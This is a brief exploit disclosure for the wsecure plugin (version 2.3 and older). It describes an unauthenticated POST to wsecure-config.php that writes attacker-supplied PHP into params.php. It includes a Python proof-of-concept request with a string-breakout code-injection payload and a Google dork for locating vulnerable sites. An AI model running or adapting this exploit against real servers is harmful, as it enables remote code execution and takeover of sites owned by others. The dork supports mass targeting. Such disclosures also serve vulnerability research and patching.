This vulnerability allows attackers to access the servers of all sites using version 2.3 of Wsecure or older with disabled "Magic Quotes" and don't require plugin be active. Plugin have more than 12000 downloads and 2000 activate installs.
Vulnerable file is wsecure-config.php. It gets your POST and allows write Executable code to params.php.
PoS on Python:
import requests
data = {'wsecure_action':'update','key':'','publish':'";\n public function __construct() { echo "Hello!"; }\n/','options':'','custom_path':'"/#"'}
site = "http://[wp-site]/wp-content/plugins/wsecure/wsecure-config.php"
res = requests.post(site, data=data)
print res.text
Version: 2.3 or older
Vendor Homepage: http://www.joomlaserviceprovider.com/
Google Dork: inurl: "/wp-content/plugins/wsecure/wsecure-config.php"